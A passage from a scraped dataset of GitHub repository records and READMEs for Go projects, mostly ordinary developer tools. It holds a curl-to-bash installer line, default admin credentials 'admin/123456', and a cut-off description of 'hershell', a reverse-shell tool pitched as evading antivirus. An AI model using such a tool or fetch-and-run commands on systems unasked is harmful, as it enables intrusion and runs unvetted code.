\u914d\u7f6e\u6587\u4ef6\u5728(`cmd/manageweb/config.yaml`)\u4e2d\uff0c\u7528\u6237\u9ed8\u8ba4\u4e3a\uff1aadmin/123456\n\n\n#### \u6e29\u99a8\u63d0\u9192\n\n1. \u9ed8\u8ba4\u914d\u7f6e\u91c7\u7528\u7684\u662f sqlite \u6570\u636e\u5e93\uff0c\u6570\u636e\u5e93\u6587\u4ef6(`\u81ea\u52a8\u751f\u6210`)\u5728`cmd/manageweb/data/goapp.db`\u3002\u5982\u679c\u60f3\u5207\u6362\u4e3a`mysql`\u6216`postgres`\uff0c\u8bf7\u66f4\u6539\u914d\u7f6e\u6587\u4ef6\uff0c\u5e76\u521b\u5efa\u6570\u636e\u5e93\uff08\u8868\u4f1a\u81ea\u52a8\u521b\u5efa\uff09\u3002\n2. \u65e5\u5fd7\u7684\u914d\u7f6e\u4e3a\u6807\u51c6\u8f93\u51fa\u5e76\u5199\u5165\u6587\u4ef6\u3002\n\n## \u524d\u7aef\u5b9e\u73b0\n\n- website/manageweb\uff1a\u57fa\u4e8e[vue-element-admin](https://github.com/PanJiaChen/vue-element-admin)\u7684\u5b9e\u73b0\u7248\u672c\n\n## \u9879\u76ee\u7ed3\u6784\u6982\u89c8\n\n
\n\u5c55\u5f00\u67e5\u770b\n
.\n\u251c\u2500\u2500 cmd  \u9879\u76ee\u7684\u4e3b\u8981\u5e94\u7528\n\u251c\u2500\u2500 internal  \u79c1\u6709\u5e94\u7528\u7a0b\u5e8f\u548c\u5e93\u4ee3\u7801\n\u251c\u2500\u2500 pkg  \u5916\u90e8\u5e94\u7528\u7a0b\u5e8f\u53ef\u4ee5\u4f7f\u7528\u7684\u5e93\u4ee3\u7801\n\u251c\u2500\u2500 vendor  \u9879\u76ee\u4f9d\u8d56\u7684\u5176\u4ed6\u7b2c\u4e09\u65b9\u5e93\n\u251c\u2500\u2500 website  vue-element-admin\n
\n
\n\n\n## \u754c\u9762\u622a\u56fe\n\n
\n\u5c55\u5f00\u67e5\u770b\n
.\n

\n

\n

\n

\n

\n
\n
\n\n## Donate\n\n- If you find this project useful, you can buy author a glass of juice \n- alipay\n- \n- wechat\n- \n- [Buy me a coffee](https://www.buymeacoffee.com/it234)\n- bitcoin address : 1LwTcCZ1p5kq8UokZGUBVy3BL1wRa3q5Wn\n- eth address : 0x68ca43651529D12996183d09a052a654F845cB89\n- eos address : 123451234534\n\n## \u76f8\u5173\u6587\u7ae0\n\n- [\u5982\u4f55\u4f7f\u7528goapp\u5199\u4f60\u7684\u540e\u53f0\u7ba1\u7406\u7cfb\u7edf] - [https://www.cnblogs.com/hotion/p/11665837.html/](https://www.cnblogs.com/hotion/p/11665837.html/)\n\n## \u611f\u8c22\u4ee5\u4e0b\u6846\u67b6\u7684\u5f00\u6e90\u652f\u6301\n\n- [Gin] - [https://gin-gonic.com/](https://gin-gonic.com/)\n- [GORM] - [http://gorm.io/](http://gorm.io/)\n- [Casbin] - [https://casbin.org/](https://casbin.org/)\n- [vue-element-admin] - [https://github.com/PanJiaChen/vue-element-admin/](https://github.com/PanJiaChen/vue-element-admin/)\n\n\n## MIT License\n\n Copyright (c) 2019 it234\n\n## \u4e0e\u4f5c\u8005\u5bf9\u8bdd\n\n> \u4f5c\u8005\u5fae\u4fe1\u53f7\uff1ait23456789\uff0c\u5fae\u4fe1\u4e8c\u7ef4\u7801\uff1a\n\n\n\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "miekg/learninggo", "link": "https://github.com/miekg/learninggo", "tags": ["golang", "book", "free", "mmark", "exercises"], "stars": 510, "description": "Learning Go Book in mmark", "lang": "Go", "repo_lang": "", "readme": "# Learning Go\n\nThis is the \"Learning Go\" book in mmark markdown. It is translated\nto HTML with [mmark](https://github.com/mmarkdown/mmark).\n\nAfter some post processing (with some javascript) [the end result, can be found\nhere](http://miek.nl/go/learninggo.html).\n\n## To Build\n\n* Download or `go get` [mmark](https://github.com/mmarkdown/mmark).\n* `cd `\n* `go build`\n* `go install` - optional\n\nAnd then just `make` in this repository.\n\n## Notes\n\nThe stack exercise and solution uses `struct` which are not being dealt with yet.\n", "readme_type": "markdown", "hn_comments": "If anyone is interested in Go (Golang) we're hiring Go developers at Torbit. http://torbit.com/jobsCould you please put this up on Leanpub (http://www.leanpub.com)? It will take care of the compiling for you, and I'd like to pay a bit for it.Also, leanpub is awesome (I'm not affiliated with them, but I'm a very happy user).The latest version should be at the bottom of this list: http://www.miek.nl/files/go/I'm tempted to learn Go just because it's a new language and I think it would be awesome to be part of a budding community.I was expecting a book on learning Go, the game. I was disappointed.I hate it when people name new things with a name that obviously conflicts with something else that's likely to be known and discussed in the same community.What is the canonical way to convert this to ASCII? Can it be done with nroff? Tried l2a and hevea. No luck.I am reading this book now and will send a commit with typo fixes when finish.Even after Effective Go and gotour I found a lot of useful information in this book. Thanks the author for his work! :)This is a great resource, especially for being free and the source being available, but in case miek is reading... what is with the left margin on even numbered pages?Looks good and up to date. Just the right amount of pages for a programming language book, IMO it shouldn't exceed 200 pages. Thank you.On first glance this looks excellent, but I have to question producing a book on a language so steeped in unicode with a markup language that makes it so unwieldy.eg. $\\Phi{}$ = ", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "contiv/netplugin", "link": "https://github.com/contiv/netplugin", "tags": ["docker", "docker-plugin", "networking", "containers", "container-networking", "kubernetes-networking"], "stars": 510, "description": "Container networking for various use cases", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://contiv-ci.ngrok.io/job/Netplugin%20Push%20Build%20Master/badge/icon)](https://contiv-ci.ngrok.io/job/Netplugin%20Push%20Build%20Master/) \n[![Go Report Card](https://goreportcard.com/badge/github.com/contiv/netplugin)](https://goreportcard.com/report/github.com/contiv/netplugin)\n\n## Netplugin\n\nGeneric network plugin is designed to handle networking use\ncases in clustered multi-host systems. It is specifically designed to handle:\n\n- Multi-tenant environment where disjoint networks are offered to containers on the same host\n- SDN applications and interoperability with SDN solutions\n- Interoperability with non container environment and hand-off to a physical network\n- Instantiating policies/ACL/QoS associated with containers\n- Multicast or multi-destination dependent applications\n- Integration with existing IPAM tools for migrating customers\n- Handle NIC's capabilities for acceleration (SRIOV/Offload/etc.)\n\n### Documentation\nFull, comprehensive documentation is available on the website:\n\nhttp://docs.contiv.io\n\nGetting-started videos are available on [YouTube](https://www.youtube.com/watch?v=KzansAxCBQE&list=PL2k86RlAekM_g6csRwSRQAWvln5SmgicN).\n\n### Getting Started\n\nThis will provide you with a minimal experience of uploading the intent and\nseeing the netplugin system act on it. It will create a network on your host\nthat lives behind an OVS bridge and has its own unique interfaces.\n\n#### Step 1: Clone the project and bringup the VMs\n\nNote: if you have $GOPATH set, then please ensure either you unset GOPATH,\nor clone the tree in `$GOPATH/src/github.com/contiv/` location\n\n```\n$ git clone https://github.com/contiv/netplugin\n$ cd netplugin; make demo\n$ vagrant ssh netplugin-node1\n```\n\nOptionally, variables can be passed to Makefile if needed. For example, to\nuse 4 GB memory and 2 CPUs for the vagrant VMs, run:\n\n```\nCONTIV_MEMORY=4096 CONTIV_CPUS=2 make demo\n```\n\nCONTIV_MEMORY and CONTIV_CPUS are set to 2048 and 4 as the default values\nrespectively.\n\n#### Step 2: Create a network\n\n```\n$ netctl net create contiv-net --subnet=20.1.1.0/24\n\tor\nnetctl net create contiv-net --subnet=20.1.1.0/24 --subnetv6=2001::/100 \n```\n\n#### Step 3: Run your containers and enjoy the networking!\n\n```\n$ docker run -itd --name=web --net=contiv-net alpine /bin/sh\n$ docker run -itd --name=db --net=contiv-net alpine /bin/sh\n$ docker exec -it web /bin/sh\n< inside the container >\nroot@f90e7fd409c4:/# ping db\nPING db (20.1.1.3) 56(84) bytes of data.\n64 bytes from db (20.1.1.3): icmp_seq=1 ttl=64 time=0.658 ms\n64 bytes from db (20.1.1.3): icmp_seq=2 ttl=64 time=0.103 ms\n```\n\n\n### Building and Testing\n\n**Note:** Vagrant 1.7.4 and VirtualBox 5.0+ are required to build and test netplugin.\n\nHigh level `make` targets:\n\n* `demo`: start three VM demo cluster for development or testing.\n* `build`: build the binary in a VM and download it to the host.\n* `unit-test`: run the unit tests. Specify `CONTIV_NODE_OS=centos` to test on centos instead of ubuntu.\n* `system-test`: run the networking/\"sanity\" tests. Specify `CONTIV_NODE_OS=centos` to test on centos instead of ubuntu.\n\n\n### How to Contribute\nPatches and contributions are welcome, please hit the GitHub page to open an\nissue or to submit patches send pull requests. Please sign your commits, and\nread [CONTRIBUTING.md](.github/CONTRIBUTING.md)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Shelnutt2/db2struct", "link": "https://github.com/Shelnutt2/db2struct", "tags": ["hacktoberfest2020"], "stars": 510, "description": "Converts a mysql table into a golang struct", "lang": "Go", "repo_lang": "", "readme": "# db2struct [![Build Status](https://travis-ci.org/Shelnutt2/db2struct.svg?branch=master)](https://travis-ci.org/Shelnutt2/db2struct) [![Coverage Status](https://coveralls.io/repos/github/Shelnutt2/db2struct/badge.svg?branch=1-add-coveralls-support)](https://coveralls.io/github/Shelnutt2/db2struct?branch=1-add-coveralls-support) [![GoDoc](https://godoc.org/github.com/Shelnutt2/db2struct?status.svg)](https://godoc.org/github.com/Shelnutt2/db2struct)\n\nThe db2struct package produces a usable golang struct from a given database table for use in a .go file.\n\nBy reading details from the database about the column structure, db2struct generates a go compatible struct type\nwith the required column names, data types, and annotations.\n\nGenerated datatypes include support for nullable columns [sql.NullX types](https://golang.org/pkg/database/sql/#NullBool) or [guregu null.X types](https://github.com/guregu/null)\nand the expected basic built in go types.\n\nDb2Struct is based/inspired by the work of ChimeraCoder's gojson package\n[gojson](https://github.com/ChimeraCoder/gojson)\n\n\n\n## Usage\n\n```BASH\ngo get github.com/Shelnutt2/db2struct/cmd/db2struct\ndb2struct --host localhost -d test -t test_table --package myGoPackage --struct testTable -p --user testUser\n```\n\n## Example\n\nMySQL table named users with four columns: id (int), user_name (varchar(255)), number_of_logins (int(11),nullable), and LAST_NAME (varchar(255), nullable) \n\nExample below uses guregu's null package, but without the option it procuded the sql.NullInt64 and so on.\n```BASH\ndb2struct --host localhost -d example.com -t users --package example --struct user -p --user exampleUser --guregu --gorm\n```\n\nOutput:\n```GOLANG\n\npackage example\n\ntype User struct {\n ID int `gorm:\"column:id\"`\n UserName string `gorm:\"column:user_name\"`\n NumberOfLogins null.Int `gorm:\"column:number_of_logins\"`\n LastName null.String `gorm:\"column:LAST_NAME\"`\n}\n```\n\n## Supported Databases\n\nCurrently Supported\n- MariaDB\n- MySQL\n\nPlanned Support\n- PostgreSQL\n- Oracle\n- Microsoft SQL Server\n\n### MariaDB/MySQL\n\nStructures are created by querying the INFORMATION_SCHEMA.Columns table and then formatting the types, column names,\nand metadata to create a usable go compatible struct type.\n\n#### Supported Datatypes\n\nCurrently only a limited number of MariaDB/MySQL datatypes are supported. Initial support includes:\n- tinyint (sql.NullInt64 or null.Int)\n- int (sql.NullInt64 or null.Int)\n- smallint (sql.NullInt64 or null.Int)\n- mediumint (sql.NullInt64 or null.Int)\n- bigint (sql.NullInt64 or null.Int)\n- decimal (sql.NullFloat64 or null.Float)\n- float (sql.NullFloat64 or null.Float)\n- double (sql.NullFloat64 or null.Float)\n- datetime (null.Time)\n- time (null.Time)\n- date (null.Time)\n- timestamp (null.Time)\n- var (sql.String or null.String)\n- enum (sql.String or null.String)\n- varchar (sql.String or null.String)\n- longtext (sql.String or null.String)\n- mediumtext (sql.String or null.String)\n- text (sql.String or null.String)\n- tinytext (sql.String or null.String)\n- binary\n- blob\n- longblob\n- mediumblob\n- varbinary\n- json\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mmorejon/microservices-docker-go-mongodb", "link": "https://github.com/mmorejon/microservices-docker-go-mongodb", "tags": [], "stars": 510, "description": "Example of Microservices in Go with Docker, Kubernetes and MongoDB", "lang": "Go", "repo_lang": "", "readme": "# Cinema - Example of Microservices in Go with Docker, Kubernetes and MongoDB\n\n## Overview\n\nCinema is an example project which demonstrates the use of microservices for a fictional movie theater.\nThe Cinema backend is powered by 4 microservices, all of which happen to be written in Go, using MongoDB for manage the database and Docker to isolate and deploy the ecosystem.\n\n * Movie Service: Provides information like movie ratings, title, etc.\n * Show Times Service: Provides show times information.\n * Booking Service: Provides booking information.\n * Users Service: Provides movie suggestions for users by communicating with other services.\n\nThe Cinema use case is based on the project written in Python by [Umer Mansoor](https://github.com/umermansoor/microservices).\n\nThe project structure is based in the knowledge learned in:\n\n* Golang structure: \n* Book Let's Go: \n\nContainer images used support multi-architectures (amd64, arm/v7 and arm64).\n\n## Index\n\n* [Deployment](#deployment)\n* [How To Use Cinema Services](#how-to-use-cinema-services)\n* [Related Posts](related-posts)\n* [Significant Revisions](#significant-revisions)\n* [The big picture](#screenshots)\n\n## Deployment\n\nThe application can be deployed in both environments: **local machine** or in a **kubernetes cluster**. You can find the appropriate documentation for each case in the following links:\n\n* [local machine (docker compose)](./docs/localhost.md)\n* [kubernetes](./docs/kubernetes.md)\n\n## How To Use Cinema Services\n\n* [endpoints](./docs/endpoints.md)\n\n## Related Posts\n\n* [Traefik 2 - Advanced configuration with Docker Compose](https://mmorejon.io/en/blog/traefik-2-advanced-configuration-docker-compose/)\n\n## Significant Revisions\n\n* [Microservices - Martin Fowler](http://martinfowler.com/articles/microservices.html)\n* [Umer Mansoor - Cinema](https://github.com/umermansoor/microservices)\n* [Traefik Proxy Docs](https://doc.traefik.io/traefik/)\n* [MongoDB Driver for Golang](https://github.com/mongodb/mongo-go-driver)\n* [MongoDB Golang Channel](https://www.youtube.com/c/MongoDBofficial/search?query=golang)\n\n## Screenshots\n\n### Architecture\n\n![overview](docs/images/overview.jpg)\n\n### Homepage\n\n![website home page](docs/images/website-home.jpg)\n\n### Users List\n\n![users list page](docs/images/website-users.jpg)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "br0xen/boltbrowser", "link": "https://github.com/br0xen/boltbrowser", "tags": [], "stars": 509, "description": "A CLI Browser for BoltDB Files", "lang": "Go", "repo_lang": "", "readme": "boltbrowser\n===========\n\nA CLI Browser for BoltDB Files\n\n![Image of About Screen](http://bullercodeworks.com/boltbrowser/ss2.png)\n\n![Image of Main Browser](http://bullercodeworks.com/boltbrowser/ss1.png)\n\nInstalling\n----------\n\nInstall in the standard way:\n\n```sh\ngo get github.com/br0xen/boltbrowser\n```\n\nThen you'll have `boltbrowser` in your path.\n\nPre-built Binaries\n------------------\nHere are pre-built binaries:\n* [Linux 64-bit](https://git.bullercodeworks.com/attachments/29367198-79f9-4fb3-9a66-f71a0e605006)\n* [Linux 32-bit](https://git.bullercodeworks.com/attachments/ba8b9116-a013-431d-b266-66dfa16f2a88)\n* [Linux Arm](https://git.bullercodeworks.com/attachments/795108a6-79e3-4723-b9a8-83803bc27f20)\n* [Windows 64-bit](https://git.bullercodeworks.com/attachments/649993d9-bf2c-46ea-98dd-1994f1c73020)\n* [Windows 32-bit](https://git.bullercodeworks.com/attachments/c1662c27-524c-465a-8739-b021fb15066b)\n* [Mac OS](https://git.bullercodeworks.com/attachments/10270b6f-9316-446d-8ab4-4022142323b3)\n\nUsage\n-----\n\nJust provide a BoltDB filename to be opened as the first argument on the command line:\n\n```sh\nboltbrowser \n```\n\nTo see all options that are available, run:\n\n```\nboltbrowser --help\n```\n\nTroubleshooting\n---------------\n\nIf you're having trouble with garbled characters being displayed on your screen, you may try a different value for `TERM`. \nPeople tend to have the best luck with `xterm-256color` or something like that. Play around with it and see if it fixes your problems.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hashicorp/go-discover", "link": "https://github.com/hashicorp/go-discover", "tags": [], "stars": 509, "description": "Discover nodes in cloud environments", "lang": "Go", "repo_lang": "", "readme": "# Go Discover Nodes for Cloud Providers [![CircleCI](https://circleci.com/gh/hashicorp/go-discover.svg?style=shield)](https://circleci.com/gh/hashicorp/go-discover) [![GoDoc](https://godoc.org/github.com/hashicorp/go-discover?status.svg)](https://godoc.org/github.com/hashicorp/go-discover)\n\n\n`go-discover` is a Go (golang) library and command line tool to discover\nip addresses of nodes in cloud environments based on meta information\nlike tags provided by the environment.\n\nThe configuration for the providers is provided as a list of `key=val key=val\n...` tuples. If either the key or the value contains a space (` `), a backslash\n(`\\`) or double quotes (`\"`) then it needs to be quoted with double quotes.\nWithin a quoted string you can use the backslash to escape double quotes or the\nbackslash itself, e.g. `key=val \"some key\"=\"some value\"`\n\nDuplicate keys are reported as error and the provider is determined through the\n`provider` key.\n\n### Supported Providers\n\nThe following cloud providers have implementations in the go-discover/provider\nsub packages. Additional providers can be added through the\n[Register](https://godoc.org/github.com/hashicorp/go-discover#Register)\nfunction.\n\n * Aliyun (Alibaba) Cloud [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/aliyun/aliyun_discover.go#L21-L34)\n * Amazon AWS [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/aws/aws_discover.go#L19-L34)\n * DigitalOcean [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/digitalocean/digitalocean_discover.go#L22-L30)\n * Google Cloud [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/gce/gce_discover.go#L23-L43)\n * Linode [Config options](https://github.com/hashicorp/go-discover/blob/master/provider/linode/linode_discover.go#L30-L41)\n * mDNS [Config options](https://github.com/hashicorp/go-discover/blob/master/provider/mdns/mdns_provider.go#L19-L31)\n * Microsoft Azure [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/azure/azure_discover.go#L24-L62)\n * Openstack [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/os/os_discover.go#L29-L44)\n * Scaleway [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/scaleway/scaleway_discover.go#L14-L22)\n * SoftLayer [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/softlayer/softlayer_discover.go#L16-L25)\n * TencentCloud [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/tencentcloud/tencentcloud_discover.go#L23-L37)\n * Triton [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/triton/triton_discover.go#L17-L27)\n * vSphere [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/vsphere/vsphere_discover.go#L145-L157)\n * Packet [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/packet/packet_discover.go#L25-L40)\n\nThe following providers are implemented in the go-discover/provider subdirectory\nbut aren't automatically registered. If you want to support these providers,\nregister them manually:\n\n * Kubernetes [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/k8s/k8s_discover.go#L32-L59)\n\nHashiCorp maintains acceptance tests that regularly allocate and run tests with\nreal resources to verify the behavior of several of these providers. Those\ncurrently are: Amazon AWS, Microsoft Azure, Google Cloud, DigitalOcean, Triton, Scaleway, AliBaba Cloud, vSphere, and Packet.net.\n\n### Config Example\n\n```\n# Aliyun (Alibaba) Cloud\nprovider=aliyun region=... tag_key=consul tag_value=... access_key_id=... access_key_secret=...\n\n# Amazon AWS\nprovider=aws region=eu-west-1 tag_key=consul tag_value=... access_key_id=... secret_access_key=...\n\n# DigitalOcean\nprovider=digitalocean region=... tag_name=... api_token=...\n\n# Google Cloud\nprovider=gce project_name=... zone_pattern=eu-west-* tag_value=consul credentials_file=...\n\n# Linode\nprovider=linode tag_name=... region=us-east address_type=private_v4 api_token=...\n\n# mDNS\nprovider=mdns service=consul domain=local\n\n# Microsoft Azure\nprovider=azure tag_name=consul tag_value=... tenant_id=... client_id=... subscription_id=... secret_access_key=...\n\n# Openstack\nprovider=os tag_key=consul tag_value=server username=... password=... auth_url=...\n\n# Scaleway\nprovider=scaleway organization=my-org tag_name=consul-server token=... region=...\n\n# SoftLayer\nprovider=softlayer datacenter=dal06 tag_value=consul username=... api_key=...\n\n# TencentCloud\nprovider=tencentcloud region=ap-guangzhou tag_key=consul tag_value=... access_key_id=... access_key_secret=...\n\n# Triton\nprovider=triton account=testaccount url=https://us-sw-1.api.joyentcloud.com key_id=... tag_key=consul-role tag_value=server\n\n# vSphere\nprovider=vsphere category_name=consul-role tag_name=consul-server host=... user=... password=... insecure_ssl=[true|false]\n\n# Packet\nprovider=packet auth_token=token project=uuid url=... address_type=...\n\n# Kubernetes\nprovider=k8s label_selector=\"app = consul-server\"\n```\n\n## Command Line Tool Usage\n\nInstall the command line tool with:\n\n```\ngo get -u github.com/hashicorp/go-discover/cmd/discover\n```\n\nThen run it with:\n\n```\n$ discover addrs provider=aws region=eu-west-1 ...\n```\n\n## Library Usage\n\nInstall the library with:\n\n```\ngo get -u github.com/hashicorp/go-discover\n```\n\nYou can then either support discovery for all available providers\nor only for some of them.\n\n```go\n// support discovery for all supported providers\nd := discover.Discover{}\n\n// support discovery for AWS and GCE only\nd := discover.Discover{\n\tProviders : map[string]discover.Provider{\n\t\t\"aws\": discover.Providers[\"aws\"],\n\t\t\"gce\": discover.Providers[\"gce\"],\n\t}\n}\n\n// use ioutil.Discard for no log output\nl := log.New(os.Stderr, \"\", log.LstdFlags)\n\ncfg := \"provider=aws region=eu-west-1 ...\"\naddrs, err := d.Addrs(cfg, l)\n```\n\nYou can also add support for providers that aren't registered by default:\n\n```go\n// Imports at top of file\nimport \"github.com/hashicorp/go-discover/provider/k8s\"\n\n// support discovery for all supported providers\nd := discover.Discover{}\n\n// support discovery for AWS and GCE only\nd := discover.Discover{\n\tProviders : map[string]discover.Provider{\n\t\t\"k8s\": &k8s.Provider{},\n\t}\n}\n\n// ...\n```\n\nFor complete API documentation, see\n[GoDoc](https://godoc.org/github.com/hashicorp/go-discover). The configuration\nfor the supported providers is documented in the\n[providers](https://godoc.org/github.com/hashicorp/go-discover/provider)\nsub-package.\n\n## Testing\n\n**Note: Due to the `go.sum` checksum errors referenced in [#68](https://github.com/hashicorp/go-discover/issues/68), \nyou will need Go 1.11.4+ to build/test go-discover.**\n\nConfiguration tests can be run with Go:\n\n```\n$ go test ./...\n```\n\nBy default tests that communicate with providers do not run unless credentials\nare set for that provider. To run provider tests you must set the necessary\nenvironment variables.\n\n**Note: This will make real API calls to the account provided by the credentials.**\n\n```\n$ AWS_ACCESS_KEY_ID=... AWS_SECRET_ACCESS_KEY=... AWS_REGION=... go test -v ./provider/aws\n```\n\nThis requires resources to exist that match those specified in tests\n(eg instance tags in the case of AWS). To create these resources,\nthere are sets of [Terraform](https://www.terraform.io) configuration\nin the `test/tf` directory for supported providers.\n\nYou must use the same account and access credentials above. The same\nenvironment variables should be applicable and read by Terraform.\n\n```\n$ cd test/tf/aws\n$ export AWS_ACCESS_KEY_ID=... AWS_SECRET_ACCESS_KEY=... AWS_REGION=...\n$ terraform init\n...\n$ terraform apply\n...\n```\n\nAfter Terraform successfully runs, you should be able to successfully\nrun the tests, assuming you have exported credentials into\nyour environment:\n\n```\n$ go test -v ./provider/aws\n```\n\nTo destroy the resources you need to use Terraform again:\n\n```\n$ cd test/tf/aws\n$ terraform destroy\n...\n```\n\n**Note: There should be no requirements to create and test these resources other\nthan credentials and Terraform. This is to ensure tests can run in development\nand CI environments consistently across all providers.**\n\n## Retrieving Test Credentials\n\nBelow are instructions for retrieving credentials in order to run\ntests for some of the providers.\n\n
\n Google Cloud\n\n1. Go to https://console.cloud.google.com/\n1. IAM & Admin / Settings:\n * Create Project, e.g. `discover`\n * Write down the `Project ID`, e.g. `discover-xxx`\n1. Billing: Ensure that the project is linked to a billing account\n1. API Manager / Dashboard: Enable the following APIs\n * Google Compute Engine API\n1. IAM & Admin / Service Accounts: Create Service Account\n * Service account name: `admin`\n * Roles:\n * `Project/Service Account Actor`\n * `Compute Engine/Compute Instance Admin (v1)`\n * `Compute Engine/Compute Security Admin`\n * Furnish a new private key: `yes`\n * Key type: `JSON`\n1. The credentials file `discover-xxx.json` will have been downloaded\n automatically to your machine\n1. Source the contents of the credentials file into the `GOOGLE_CREDENTIALS`\n environment variable\n\n
\n\n
\n Azure\nSee also the [Terraform provider documentation](https://www.terraform.io/docs/providers/azurerm/index.html#creating-credentials).\n\n```shell\n# Install Azure CLI (https://github.com/Azure/azure-cli)\ncurl -L https://aka.ms/InstallAzureCli | bash\n\n# 1. Login\n$ az login\n\n# 2. Get SubscriptionID\n$ az account list\n[\n {\n \"cloudName\": \"AzureCloud\",\n \"id\": \"subscription_id\",\n \"isDefault\": true,\n \"name\": \"Gratis versie\",\n \"state\": \"Enabled\",\n \"tenantId\": \"tenant_id\",\n \"user\": {\n \"name\": \"user@email.com\",\n \"type\": \"user\"\n }\n }\n]\n\n# 3. Switch to subscription\n$ az account set --subscription=\"subscription_id\"\n\n# 4. Create ClientID and Secret\n$ az ad sp create-for-rbac --role=\"Contributor\" --scopes=\"/subscriptions/subscription_id\"\n{\n \"appId\": \"client_id\",\n \"displayName\": \"azure-cli-2017-07-18-16-51-43\",\n \"name\": \"http://azure-cli-2017-07-18-16-51-43\",\n \"password\": \"client_secret\",\n \"tenant\": \"tenant_id\"\n}\n\n# 5. Export the Credentials for the client\nexport ARM_CLIENT_ID=client_id\nexport ARM_CLIENT_SECRET=client_secret\nexport ARM_TENANT_ID=tenant_id\nexport ARM_SUBSCRIPTION_ID=subscription_id\n\n# 6. Test the credentials\n$ az vm list-sizes --location 'West Europe'\n```\n
\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "awslabs/eks-node-viewer", "link": "https://github.com/awslabs/eks-node-viewer", "tags": [], "stars": 509, "description": "EKS Node Viewer", "lang": "Go", "repo_lang": "", "readme": "[![GitHub License](https://img.shields.io/badge/License-Apache%202.0-ff69b4.svg)](https://github.com/awslabs/eks-node-viewer/blob/main/LICENSE)\n[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/awslabs/eks-node-viewer/issues)\n\n## Usage\n\n`eks-node-viewer` is a tool for visualizing dynamic node usage within a cluster. It was originally developed as an internal tool at AWS for demonstrating consolidation with [Karpenter](https://karpenter.sh/). It displays the scheduled pod resource requests vs the allocatable capacity on the node. It *does not* look at the actual pod resource usage.\n\n![](./.static/screenshot.png)\n\n### Talks Using eks-node-viewer\n\n- [Containers from the Couch: Workload Consolidation with Karpenter](https://www.youtube.com/watch?v=BnksdJ3oOEs)\n- [AWS re:Invent 2022 - Kubernetes virtually anywhere, for everyone](https://www.youtube.com/watch?v=OB7IZolZk78)\n\n### Installation\n\n```shell\ngo install github.com/awslabs/eks-node-viewer/cmd/eks-node-viewer@latest\n```\n\nNote: This will install it to your `GOBIN` directory, typically `~/go/bin` if it is unconfigured.\n\n## Usage\n```shell\nUsage of ./eks-node-viewer:\n -context string\n \tName of the kubernetes context to use\n -disable-pricing\n \tDisable pricing lookups\n -extra-labels string\n \tA comma separated set of extra node labels to display\n -kubeconfig string\n \tAbsolute path to the kubeconfig file (default \"~/.kube/config\")\n -node-selector string\n \tNode label selector used to filter nodes, if empty all nodes are selected\n -resources string\n \tList of comma separated resources to monitor (default \"cpu\")\n```\n\n### Examples\n```shell\n# Standard usage\neks-node-viewer\n# Karenter nodes only\neks-node-viewer --node-selector \"karpenter.sh/provisioner-name\"\n# Display both CPU and Memory Usage\neks-node-viewer --resources cpu,memory\n# Display extra labels, i.e. AZ\neks-node-viewer --extra-labels topology.kubernetes.io/zone\n# Specify a particular AWS profile and region\nAWS_PROFILE=myprofile AWS_REGION=us-west-2\n```\n\n\n### Default Options\nYou can supply default options to `eks-node-viewer` by creating a file named `.eks-node-viewer` in your home directory and specifying\noptions there. The format is `option-name=value` where the option names are the command line flags:\n```text\n# select only Karpenter managed nodes\nnode-selector=karpenter.sh/provisioner-name\n\n# display both CPU and memory\nresources=cpu,memory\n```\n\n\n### Troubleshooting\n\n#### NoCredentialProviders: no valid providers in chain. Deprecated.\n\nThis CLI relies on AWS credentials to access pricing data if you don't use the `--disable-pricing` option. You must have credentials configured via `~/aws/credentials`, `~/.aws/config`, environment variables, or some other credential provider chain.\n\nSee [credential provider documentation](https://docs.aws.amazon.com/sdk-for-go/api/aws/session/) for more.\n\n#### I get an error of `creating client, exec plugin: invalid apiVersion \"client.authentication.k8s.io/v1alpha1\"`\n\nUpdating your AWS cli to the latest version and [updating your kubeconfig](https://docs.aws.amazon.com/cli/latest/reference/eks/update-kubeconfig.html) should resolve this issue.\n\n## Development\n\n### Building\n```shell\n$ make build\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sysdream/hershell", "link": "https://github.com/sysdream/hershell", "tags": ["pentest", "reverse-shell", "infosec", "redteam"], "stars": 509, "description": "Hershell is a simple TCP reverse shell written in Go.", "lang": "Go", "repo_lang": "", "readme": "# Hershell\n\n**NOTE:** the project has been forked on [this repo](https://github.com/lesnuages/hershell), check there for any other developments.\n\nHershell is a simple TCP reverse shell written in [Go](https://golang.org).\n\nIt uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception.\n\nSupported OS are:\n\n- Windows\n- Linux\n- Mac OS\n- FreeBSD and derivatives\n\n## Why ?\n\nAlthough meterpreter payloads are great, they are sometimes spotted by AV products.\n\nThe goal of this project is to get a simple reverse shell, which can work on multiple systems.\n\n## How ?\n\nSince it's written in Go, you can cross compile the source for the desired architecture.\n\n## Getting 